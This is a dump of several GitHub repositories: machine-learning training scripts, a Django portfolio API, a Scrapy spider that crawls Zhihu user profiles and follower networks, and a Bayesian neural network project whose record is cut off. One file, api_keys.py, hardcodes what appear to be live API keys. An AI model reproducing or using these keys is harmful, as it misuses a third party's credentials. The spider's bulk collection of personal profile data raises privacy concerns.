zero_pad_mask(np.array(np.where(train_head_mask)).T, n_pos = 13)\n\t\t\t\n\t\t\toutput_mask = np.zeros((batch_size, 13))\n\t\t\tfor row in range(batch_size):\n\t\t\t\tend = len(train_head_pos[row])\n\t\t\t\toutput_mask[row,end:] = -999999999\n\t\t\t#print(output_mask)\n\t\t\t#x = asd\n\t\t\t#todo input mask idx\n\t\t\t#x = asd\n\t\t\t#test_mask_shape = (len(test_input_ids), max_seq_length, bert_out_size)\n\t\t\t#test_tok_pos, test_head_pos = tok_hdr_start_top(test_input_ids)\n\t\t\t#test_tok_mask, test_head_mask, test_head_col_mask = create_wemb_masks(test_tok_pos, test_head_pos, test_mask_shape)\n\t\t\t\n\t\t\tlayer_weights = []\n\t\t\t#x = sad\n\t\t\t#model = build_model_masked(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(test_mask_shape[1:]))\n\t\t\t\n\t\t\tif epoch == 0 and b == 0:\n\t\t\t\tmodel, seq_output = build_model_masked_select(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(train_mask_shape[1:]), mask_idx = train_head_mask_idx)\n\t\t\t\tinitialize_vars(sess)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttest = slice_concat()\n\t\t\t\ttest.build(train_head_mask_idx)\n\t\t\t\ttest = test(seq_output)\n\t\t\t\tmodel.layers[4] = test\n\t\t\t\n\t\t\t#if len(layer_weights) > 0:\n\t\t\t#\tmodel.layers[5].set_weights(layer_weights)\n\t\t\tprint(epoch, '-', b)\n\t\t\tmodel.fit(\n\t\t\t\t#[train_input_ids, train_input_masks, train_segment_ids, train_weights], \n\t\t\t\t[in_train_input_ids, in_train_input_masks, in_train_segment_ids, train_tok_mask, train_head_mask, train_head_col_mask, output_mask], \n\t\t\t\t\t{\"sc_output\":in_train_labels_sc},\n\t\t\t\t#validation_data=(#[test_input_ids,test_input_masks,test_segment_ids, test_weights],\n\t\t\t\t#\t\t\t[test_input_ids,test_input_masks,test_segment_ids, test_tok_mask, test_head_mask[:,:,0], test_head_col_mask],\n\t\t\t\t#\t\t\t\t {\"sc_output\":test_labels_sc}),\n\t\t\t\tepochs=1,\n\t\t\t\tbatch_size=batch_size\n\t\t\t)\n\t\t\n\t\t#layer_weights = model.layers[5].get_weights()\n\t\t# In[ ]:\n\n\n\n\t# Build the rest of the classifier \n\t\t\n\t#max_out_len = 3\n\t#model = 
build_model(max_seq_length=222,max_out_len=max_out_len)\n\n\t# Instantiate variables\n\t\n\tmodel.fit(\n\t\t#[train_input_ids, train_input_masks, train_segment_ids, train_weights], \n\t\t[train_input_ids, train_input_masks, train_segment_ids, train_tok_mask, train_head_mask, train_head_col_mask, output_mask], \n\t\t\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t\t\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\t\tvalidation_data=(#[test_input_ids,test_input_masks,test_segment_ids, test_weights],\n\t\t\t\t\t[test_input_ids,test_input_masks,test_segment_ids, test_tok_mask, test_head_mask, test_head_col_mask],\n\t\t\t\t\t\t {\"sc_output\":test_labels_sc,\"sa_output\":test_labels_sa,\n\t\t\t\t\t\t \"wn_output\":test_labels_wn,\"wc_output\":test_labels_wc,\n\t\t\t\t\t\t \"wo_output\":test_labels_wo}),\n\t\tepochs=1,\n\t\tbatch_size=32\n\t)\n\t\t\n\t\n\tx = sad\n\n\t# In[68]:\n\n\n\ti = 1\n\ttest_example = test_data[i]\n\tp_id,p_mask,p_seg = formatForBert([test_example])\n\n\tinput1,input2,input3,input4 = p_id,p_mask,p_seg,np.array([test_weights[i,:]])\n\n\n\t# In[70]:\n\n\n\ttest_example\n\n\n\t# In[69]:\n\n\n\tmodel.predict([input1,input2,input3,input4])\n\n\n\t# In[89]:\n\n\n\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\ttrain_labels_wo.max()\n\n\n\t# In[143]:\n\n\n\t\n\n\n\t# In[19]:\n\n\n\twc.shape,wo.shape\n\n" } ]
2
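The `ds-keshev/sqlova` record above packs each natural-language question and its table headers into one BERT input of the form `[CLS] question [SEP] header1 [SEP] header2 [SEP] … padding` (`generate_inputs`), then recovers the question and header spans purely from the positions of the `[SEP]` ids (`tok_hdr_start_top`, which searches for id 102). A minimal sketch of that round trip, skipping WordPiece tokenization entirely: the special ids 101/102/0 are the real `[CLS]`/`[SEP]`/`[PAD]` ids of the uncased BERT vocabulary, while the content ids are stand-ins.

```python
import numpy as np

CLS, SEP, PAD = 101, 102, 0  # real uncased-BERT special ids; content ids below are stand-ins

def pack(question_ids, header_ids, max_len):
    """[CLS] question [SEP] h1 [SEP] h2 [SEP] ... then zero padding."""
    ids = [CLS] + question_ids + [SEP]
    for h in header_ids:
        ids = ids + h + [SEP]
    ids += [PAD] * (max_len - len(ids))
    return np.array(ids)

def spans_from_seps(ids):
    """Recover the question span and each header span from [SEP] positions alone."""
    seps = np.where(ids == SEP)[0]
    question = (1, int(seps[0]))  # position 0 is [CLS]
    headers = [(int(seps[k - 1]) + 1, int(seps[k])) for k in range(1, len(seps))]
    return question, headers

ids = pack([7, 8, 9], [[21, 22], [31]], max_len=12)
print(ids)                   # [101   7   8   9 102  21  22 102  31 102   0   0]
print(spans_from_seps(ids))  # ((1, 4), [(5, 7), (8, 9)])
```

Recovering spans from `[SEP]` positions is what lets `create_wemb_masks` in the record separate question embeddings from header embeddings after a single BERT forward pass.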
MinuteSheep/zhihu
https://github.com/MinuteSheep/zhihu
ec7f22aca2b6a29e9141dea302d3543f6bc5b4d2
735f9847aa8bb311f56cfbb611fd6ac23b707baf
6d367fcd9fe8f4e8e4e0a5be939e4c750bda90e4
refs/heads/master
2020-03-26T20:26:16.264905
2018-08-19T17:15:43
2018-08-19T17:15:43
145,323,653
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6775431632995605, "alphanum_fraction": 0.6794625520706177, "avg_line_length": 33.66666793823242, "blob_id": "f432da515a44646995b93d975be44e657e68403c", "content_id": "27970b4d3d576dd4486a9c651009f2fc7b80a11f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/zhihu/pipelines.py", "repo_name": "MinuteSheep/zhihu", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\n\n\nclass MongoPipeline(object):\n def process_item(self, item, spider):\n client = pymongo.MongoClient(spider.settings.get('MONGO_URI'))\n db = client[spider.settings.get('MONGO_DB')]\n table = db[spider.settings.get('MONGO_TABLE')]\n table.update({'name':item['name']},dict(item),True)\n\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.635904848575592, "avg_line_length": 53.39215850830078, "blob_id": "2571abe4b3f1e6f33e0ec5d706a81e7542886e82", "content_id": "8072bda3a41e918c12a905fdce5da2de8bcc6cfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2774, "license_type": "no_license", "max_line_length": 176, "num_lines": 51, "path": "/zhihu/spiders/user.py", "repo_name": "MinuteSheep/zhihu", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nfrom zhihu.items import ZhihuItem\n\n\nclass UserSpider(scrapy.Spider):\n name = 'user'\n allowed_domains = ['www.zhihu.com']\n start_user = 'zhang-jia-wei'\n user_url = 'https://www.zhihu.com/api/v4/members/%s?include=%s'\n user_include = 'allow_message,is_followed,is_following,is_org,is_blocking,employments,answer_count,follower_count,articles_count,gender,badge[?(type=best_answerer)].topics'\n followings_url = 'https://www.zhihu.com/api/v4/members/%s/followees?include=%s&offset=20&limit=20'\n followings_include = 'data[*].answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics'\n followers_url = 'https://www.zhihu.com/api/v4/members/%s/followers?include=%s&offset=20&limit=20'\n followers_include = 'data[*].answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics'\n\n def start_requests(self):\n yield scrapy.Request(self.user_url % (self.start_user, self.user_include), callback=self.parse_user)\n\n def parse_user(self, request):\n item = ZhihuItem()\n results = json.loads(request.text)\n for field in item.fields:\n if field in results.keys():\n item[field] = results.get(field)\n yield item\n yield scrapy.Request(self.followings_url % (results.get('url_token'), self.followings_include),\n callback=self.parse_followings)\n yield scrapy.Request(self.followers_url % (results.get('url_token'), self.followers_include),\n callback=self.parse_followers)\n\n def parse_followings(self, request):\n results = json.loads(request.text)\n if 'data' in results.keys():\n for result in results.get('data'):\n yield scrapy.Request(self.user_url % (result.get('url_token'), self.user_include),\n callback=self.parse_user)\n if 'paging' in results.keys() and results.get('paging').get('is_end') == 'false':\n next_page = results.get('paging').get('next')\n yield scrapy.Request(next_page, callback=self.parse_followings)\n\n def 
parse_followers(self, request):\n results = json.loads(request.text)\n if 'data' in results.keys():\n for result in results.get('data'):\n yield scrapy.Request(self.user_url % (result.get('url_token'), self.user_include),\n callback=self.parse_user)\n if 'paging' in results.keys() and results.get('paging').get('is_end') == 'false':\n next_page = results.get('paging').get('next')\n yield scrapy.Request(next_page, callback=self.parse_followers)\n" } ]
2
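Both spiders in the `MinuteSheep/zhihu` record above decide whether to paginate with `results.get('paging').get('is_end') == 'false'`. After `json.loads`, the JSON literal `false` arrives as the Python boolean `False`, never as the string `'false'`, so that branch can never fire and the `next` page is never requested. A small self-contained illustration of the failure and of a boolean check that works — the payload below is a hand-made stand-in, not a captured Zhihu response:

```python
import json

# json.loads turns the JSON literal false into the Python boolean False.
page = json.loads('{"paging": {"is_end": false, "next": "https://example.com/api?offset=20"}}')
paging = page.get("paging", {})

print(paging.get("is_end") == "false")  # False -- a bool never equals a str
if paging.get("is_end") is False:       # compare against the decoded boolean instead
    print("fetch next page:", paging["next"])
```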
andyhyshi/Weather-Changes
https://github.com/andyhyshi/Weather-Changes
acdb7b556467b8bbbd02f2310f023bfbf49bc6ba
30cb4d57ff32dac8c1b90f873435c898b10987c8
9973c8866c89ee4726e243a01c4d08b9a2e9a768
refs/heads/master
2022-07-16T15:23:31.470198
2020-05-10T23:03:55
2020-05-10T23:03:55
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.75, "avg_line_length": 21.399999618530273, "blob_id": "52e24e68ce3063405e1a76acda267faedec912fc", "content_id": "44896f5eeaa8a13ed91a870256480df7eb1039d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 112, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/starter_code/api_keys.py", "repo_name": "andyhyshi/Weather-Changes", "src_encoding": "UTF-8", "text": "# OpenWeatherMap API Key\nweather_api_key = \"6956968996d9e0c5c5a9bac119faa2e7\"\n\n# Google API Key\ng_key = \"AIzaSyDvdrUOBRkNKwWnuOOQR6wEJER3I25tAUA\"\n" } ]
1
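The single file in the `andyhyshi/Weather-Changes` record above commits what look like live OpenWeatherMap and Google API keys directly into `api_keys.py`. A common alternative is to read them from the environment so the secrets never enter version control; this is a sketch only, and the environment-variable names are illustrative rather than an existing convention of that repo.

```python
import os

# Read both keys from the environment at import time and fail fast if absent.
weather_api_key = os.environ.get("OPENWEATHER_API_KEY")
g_key = os.environ.get("GOOGLE_API_KEY")

if not weather_api_key or not g_key:
    raise RuntimeError(
        "Set OPENWEATHER_API_KEY and GOOGLE_API_KEY in the environment "
        "before importing this module."
    )
```

Keys that have already been pushed should be treated as compromised and rotated, since they remain visible in the repository history even after the file is changed.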
chromebanana/django-portfolio
https://github.com/chromebanana/django-portfolio
94ce44dfb484b668556c972f6fc9b9b777cfdb63
731ef750029d7c8a64be13949c39a3a58900ed7b
073953e5f64a873ab0465abf71ecc305c5c25d7a
refs/heads/master
2022-12-30T17:36:55.325872
2020-10-14T14:23:13
2020-10-14T14:23:13
303,795,095
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7998046875, "alphanum_fraction": 0.7998046875, "avg_line_length": 30.060606002807617, "blob_id": "ea0e6771264132a848bef4e828ddcc899005c088", "content_id": "e3df867a2d1487af48dfa6461ddca1c47f97be23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1024, "license_type": "no_license", "max_line_length": 67, "num_lines": 33, "path": "/articles/api/views.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom drf_multiple_model.views import ObjectMultipleModelAPIView\n\nfrom articles.models import Professional, Qualification\nfrom .serializers import ArticleSerializer, QualificationSerializer\n\nclass ArticleAPIView(ObjectMultipleModelAPIView):\n\tquerylist = [\n\t\t{\n\t\t\t'queryset' : Professional.objects.all(),\n\t\t\t'serializer_class' : ArticleSerializer\n\t\t},\n\t\t{\n\t\t\t'queryset' : Qualification.objects.all(),\n\t\t\t'serializer_class' : QualificationSerializer\n\t\t}\n\t]\n\nclass ArticleListView(ListAPIView):\n\tqueryset = Professional.objects.all()\n\tserializer_class = ArticleSerializer\n\nclass ArticleDetailView(RetrieveAPIView):\n\tqueryset = Professional.objects.all()\n\tserializer_class = ArticleSerializer\n\n# class QualificationListView(ListAPIView):\n# \tqueryset = Qualification.objects.all()\n# \tserializer_class = QualificationSerializer\n\n# class QualificationDetailView(RetrieveAPIView):\n# \tqueryset = Qualification.objects.all()\n# \tserializer_class = QualificationSerializer" }, { "alpha_fraction": 0.4798206388950348, "alphanum_fraction": 0.5313901305198669, "avg_line_length": 30.85714340209961, "blob_id": "9989a5b60ef9542d3a9ef44a837b69065eaf2153", "content_id": "c3c59d0065e37fd33f05b81a9a41652465666c2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 892, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/articles/migrations/0003_qualification.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.2 on 2020-10-14 10:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articles', '0002_auto_20201014_0953'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Qualification',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('location', models.CharField(max_length=120)),\n ('date', models.CharField(max_length=120)),\n ('body', models.TextField()),\n ('role', models.CharField(max_length=120)),\n ('institution', models.CharField(max_length=120)),\n ('grade', models.CharField(max_length=120)),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 29.200000762939453, "blob_id": "fff0e5b43c6540cf809bf0d2ec0931e6a3ec3a08", "content_id": "8b0495fc6037f99c67bddf77a6c44fdea493bec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 100, "num_lines": 5, "path": "/README.md", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app).\n\ndjango backend\nreact frontend\ndeployed on heroku\n\n" 
}, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 24.33333396911621, "blob_id": "538e005a6cecc6fab3555a806bd0ade08013e283", "content_id": "1f8a7fcef8cb9ec4ef27dacc11a150068cda3b98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/articles/admin.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import Professional, Qualification\n\nadmin.site.register(Professional)\nadmin.site.register(Qualification)\n" }, { "alpha_fraction": 0.773413896560669, "alphanum_fraction": 0.773413896560669, "avg_line_length": 24.538461685180664, "blob_id": "77a2e486dd50bc17cdacc094757c9f92f3971bcd", "content_id": "3605737baf5395e54af7b7d55d3bd8813b06e769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/articles/api/serializers.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\n\nfrom articles.models import Professional, Qualification\n\nclass ArticleSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Professional\n\t\tfields = (\"__all__\")\n\t\nclass QualificationSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Qualification\n\t\tfields = (\"__all__\")" }, { "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.75, "avg_line_length": 22.521739959716797, "blob_id": "aaf0e5bb513ef5e68f640d747b0d8c4a8331093b", "content_id": "0cab660884d4254db9b478b70ec7a9e4ea6fe5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 48, "num_lines": 23, "path": "/articles/models.py", "repo_name": "chromebanana/django-portfolio", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass Article(models.Model):\n\tlocation = models.CharField(max_length=120)\n\tdate = models.CharField(max_length=120)\n\tbody = models.TextField()\n\n\tclass Meta:\n\t\tabstract = True\n\nclass Professional(Article):\n\trole = models.CharField(max_length=120)\n\torganisation = models.CharField(max_length=120)\n\n\tdef __str__(self):\n\t\treturn self.organisation\n\nclass Qualification(Article):\n\tinstitution = models.CharField(max_length=120)\n\tgrade = models.CharField(max_length=120) \n\n\tdef __str__(self):\n\t\treturn self.institution" } ]
6
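The `chromebanana/django-portfolio` record above keeps the shared columns (`location`, `date`, `body`) on an abstract `Article` base model, so Django creates tables only for the concrete `Professional` and `Qualification` subclasses, and it exposes both through `ModelSerializer`s declared with `fields = ("__all__")`. A sketch of what one serialized row looks like, run inside a configured Django context such as `python manage.py shell` and assuming `articles.api` is importable as the repo's own views suggest; the field values and the printed dict are illustrative.

```python
from articles.models import Professional
from articles.api.serializers import ArticleSerializer

# An unsaved instance is enough for serialization; its primary key stays
# None until .save() is called.
row = Professional(
    role="Engineer",
    organisation="Acme",
    location="London",
    date="2019-2020",
    body="Built the API.",
)
print(ArticleSerializer(row).data)
# -> {'id': None, 'location': 'London', 'date': '2019-2020',
#     'body': 'Built the API.', 'role': 'Engineer', 'organisation': 'Acme'}
```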
vie2bgd/bayesianNN
https://github.com/vie2bgd/bayesianNN
5aa605334aecf6e2d84ec9d73438404b231e03e7
7d7b8490037b215b6843dbeed52f0e95e7381c6b
7988769616da952e8c038d999f98ea63562d4ca0
refs/heads/master
2021-09-15T01:52:46.646406
2018-05-23T20:07:20
2018-05-23T20:07:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6643538475036621, "alphanum_fraction": 0.6895056366920471, "avg_line_length": 33.969696044921875, "blob_id": "7a59a0eae2a4c9bed878dadfddac01fe76a2e84b", "content_id": "7dd80f661133d474bdd61f712156b06ee9ce7d78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 107, "num_lines": 33, "path": "/datamanipulation.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"variables.csv.txt\", sep='\\t')\n\n# last column is the response variable\ny = np.array(data[data.columns[-1]], dtype='float32')\n# rest of the variables (except the first) are the features\nx = np.array(data[data.columns[1:-1]], dtype='float32')\n\n# since x_6850 -> x_6908 has variance 0 they don't contribute to our mapping, therefore we remove them here\nx = x[0:len(x), 0:6849]\n\nprint(\"Original data dimensions:\", x.shape)\n\n# Remove varuables with 100% correlation with another one\ncorr_matrix = np.corrcoef(np.transpose(x))\n\nvar_to_remove = []\nprint(\"Checking for full correlation...\")\nfor i in range(corr_matrix.shape[0]):\n for j in range(corr_matrix.shape[1]):\n if j <= i:\n continue # since symmetry\n elif abs(corr_matrix[i][j]) == 1 & j not in var_to_remove:\n var_to_remove.append(i)\n\n# print(var_to_remove)\nx = np.delete(x, var_to_remove, axis=1) # removing variables that are fully correlated with another one\nprint(\"New dimension:\", x.shape)\n\n# save the data to local file to be loaded later for training\nnp.savez('drug_data.npz', features=x, labels=y)" }, { "alpha_fraction": 0.6613546013832092, "alphanum_fraction": 0.6677500605583191, "avg_line_length": 42.75688171386719, "blob_id": "2ac286f9c713e9b4827e973b4b2d9260ff338edc", "content_id": "a92539ac5c25c248c6bbe0f7e211156c6620c4b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9538, "license_type": "no_license", "max_line_length": 118, "num_lines": 218, "path": "/finalmodel.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Dependencies\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport math\nfrom flags import *\nfrom utils import *\nfrom sklearn.decomposition import PCA\n\ntfd = tf.contrib.distributions\n\n# Tuning program settings\nFLAGS = flags.FLAGS\nFLAGS.learning_rate = 0.09 # change\nFLAGS.num_hidden_layers = 7\nFLAGS.num_neurons_per_layer = 3\nFLAGS.activation_function = \"sigmoid\"\nFLAGS.num_principal_components = 369\nFLAGS.batch_size = 44 # kept constant under hyperopt\nFLAGS.num_epochs = 10000 # kept constant under hyperopt\n\nTRAIN_PERCENTAGE = 0.8\n\ndef build_input_pipeline(drug_data_path, batch_size,\n number_of_principal_components):\n \"\"\"Build an Iterator switching between train and heldout data.\n Args:\n `drug_data`: string representing the path to the .npy dataset.\n `batch_size`: integer specifying the batch_size for the dataset.\n `number_of_principal_components`: integer specifying how many principal components\n to reduce the dataset into.\n \"\"\"\n # Build an iterator over training batches.\n with np.load(drug_data_path) as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n\n # PCA (sklearn)\n features = 
PCA(n_components=number_of_principal_components).fit_transform(features)\n\n # Splitting into training and validation sets\n train_range = int(TRAIN_PERCENTAGE * len(features))\n\n training_features = features[:train_range]\n training_labels = labels[:train_range]\n validation_features = features[train_range:]\n validation_labels = labels[train_range:]\n\n # Z-normalising: (note with respect to training data)\n training_features = (training_features - np.mean(training_features, axis=0))/np.std(training_features, axis=0)\n validation_features = (validation_features - np.mean(training_features, axis=0))/np.std(training_features, axis=0)\n\n # Create the tf.Dataset object\n training_dataset = tf.data.Dataset.from_tensor_slices((training_features, training_labels))\n\n # Shuffle the dataset (note shuffle argument much larger than training size)\n # and form batches of size `batch_size`\n training_batches = training_dataset.shuffle(20000).repeat().batch(batch_size)\n training_iterator = training_batches.make_one_shot_iterator()\n\n # Build a iterator over the heldout set with batch_size=heldout_size,\n # i.e., return the entire heldout set as a constant.\n heldout_dataset = tf.data.Dataset.from_tensor_slices(\n (validation_features, validation_labels))\n heldout_frozen = (heldout_dataset.take(len(validation_features)).\n repeat().batch(len(validation_features)))\n heldout_iterator = heldout_frozen.make_one_shot_iterator()\n\n # Combine these into a feedable iterator that can switch between training\n # and validation inputs.\n # Here should the minibatch increment be defined \n handle = tf.placeholder(tf.string, shape=[])\n feedable_iterator = tf.data.Iterator.from_string_handle(\n handle, training_batches.output_types, training_batches.output_shapes)\n features_final, labels_final = feedable_iterator.get_next()\n\n return features_final, labels_final, handle, training_iterator, heldout_iterator, train_range\n\n\ndef main(argv):\n # extract the activation function from the hyperopt spec as an attribute from the tf.nn module\n activation = getattr(tf.nn, FLAGS.activation_function)\n\n # define the graph\n with tf.Graph().as_default():\n (features, labels, handle,\n training_iterator, heldout_iterator, train_range) = build_input_pipeline(\n \"drug_data.npz\", FLAGS.batch_size, FLAGS.num_principal_components)\n\n # Building the Bayesian Neural Network. 
\n # We are here using the Gaussian Reparametrization Trick\n # to compute the stochastic gradients as described in the paper\n with tf.name_scope(\"bayesian_neural_net\", values=[features]):\n neural_net = tf.keras.Sequential()\n for i in range(FLAGS.num_hidden_layers):\n layer = tfp.layers.DenseReparameterization(\n units=FLAGS.num_neurons_per_layer,\n activation=activation,\n trainable=True,\n kernel_prior_fn=default_multivariate_normal_fn, # NormalDiag with hyperopt sigma\n kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n kernel_posterior_tensor_fn=lambda x: x.sample(),\n bias_prior_fn=default_multivariate_normal_fn, # NormalDiag with hyperopt sigma\n bias_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n bias_posterior_tensor_fn=lambda x: x.sample()\n )\n neural_net.add(layer)\n neural_net.add(tfp.layers.DenseReparameterization(\n units=1, # one dimensional output\n activation=None, # since regression (outcome not bounded)\n trainable=True, # i.e subject to optimization\n kernel_prior_fn=default_multivariate_normal_fn, # NormalDiag\n kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n kernel_posterior_tensor_fn=lambda x: x.sample(),\n bias_prior_fn=default_multivariate_normal_fn, # NormalDiag\n bias_posterior_fn=tfp.layers.default_mean_field_normal_fn(), # softplus(sigma)\n bias_posterior_tensor_fn=lambda x: x.sample()\n ))\n predictions = neural_net(features)\n\n preds = []\n for _ in range(1000):\n preds.append(neural_net(features))\n\n MAP, var = tf.nn.moments(tf.squeeze(preds), axes=[0])\n \n # Compute the -ELBO as the loss, averaged over the batch size.\n neg_log_likelihood = tf.reduce_mean(tf.squared_difference(labels, predictions))\n kl = sum(neural_net.losses) / FLAGS.batch_size\n elbo_loss = kl + neg_log_likelihood\n\n # Build metrics for evaluation. Predictions are formed from a single forward\n # pass of the probabilistic layers. 
They are cheap but noisy predictions.\n accuracy, accuracy_update_op = tf.metrics.mean_squared_error(\n labels=labels, predictions=predictions)\n\n with tf.name_scope(\"train\"):\n # define optimizer - we are using (stochastic) gradient descent\n opt = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate)\n\n # define that we want to minimize the loss (-ELBO)\n train_op = opt.minimize(elbo_loss)\n # start the session\n sess = tf.Session()\n # initialize the variables\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n # Run the training loop\n train_handle = sess.run(training_iterator.string_handle())\n heldout_handle = sess.run(heldout_iterator.string_handle())\n \n # Run the epochs\n for epoch in range(FLAGS.num_epochs):\n _ = sess.run([train_op, accuracy_update_op],\n feed_dict={handle: train_handle})\n \n if epoch % 100 == 0:\n loss_value, accuracy_value = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: train_handle})\n loss_value_validation, accuracy_value_validation = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: heldout_handle}\n )\n print(\"Epoch: {:>3d} Loss: [{:.3f}, {:.3f}] Accuracy: [{:.3f}, {:.3f}]\".format(\n epoch, loss_value, loss_value_validation, accuracy_value, accuracy_value_validation))\n\n # Check if final epoch, if so return the validation loss for the last epoch \n if epoch == FLAGS.num_epochs-1:\n final_loss, final_accuracy = sess.run(\n [elbo_loss, accuracy], feed_dict={handle: heldout_handle}\n )\n print(\"Final loss: [{:.3f}, {:.3f}] Final accuracy: [{:.3f}, {:.3f}]\".format(\n loss_value, loss_value_validation, accuracy_value, accuracy_value_validation))\n\n with tf.name_scope(\"evaluate\"):\n # interpolate the predictive distributions and get the percentiles to represent\n # an empirical credible interval for the predictions\n\n predictions = np.asarray([sess.run(predictions,\n feed_dict={handle: heldout_handle})\n for _ in range(FLAGS.num_monte_carlo)])\n\n predictions = np.squeeze(predictions) # fix the dimensions into a flat matrix\n credible_intervals = [] # will be a matrix with with lower- and upper bound as columns\n # loop over the columns and compute the empirical credible interval\n modes = []\n for i in range(predictions.shape[1]):\n lb = np.percentile(predictions[:,i], 2.5)\n ub = np.percentile(predictions[:,i], 97.5)\n mode = np.mean(predictions[:,i])\n credible_intervals.append([lb, ub])\n modes.append(mode)\n\n # check how often the true vale is inside the credible interval\n with np.load(\"drug_data.npz\") as data:\n labels = data[\"labels\"]\n features = data[\"features\"]\n train_range = int(TRAIN_PERCENTAGE * len(features))\n validation_labels = labels[train_range:]\n\n inside = 0\n SSE = 0\n for i in range(validation_labels.shape[0]):\n label = validation_labels[i]\n if label >= credible_intervals[i][0] and label <= credible_intervals[i][1]:\n inside += 1\n SSE += (label - modes[i])**2\n\n print(\"MSE\", SSE/validation_labels.shape[0])\n print(inside/validation_labels.shape[0])\n\n\nif __name__ == \"__main__\":\n tf.app.run()" }, { "alpha_fraction": 0.6796407103538513, "alphanum_fraction": 0.699999988079071, "avg_line_length": 28.3157901763916, "blob_id": "64c17a9e8cdc6bd26635bb16331cd426a6ade907", "content_id": "7e884ee9c26147888f98bdb2f3f3c72024e29597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1670, "license_type": "no_license", "max_line_length": 70, "num_lines": 57, "path": "/flags.py", "repo_name": 
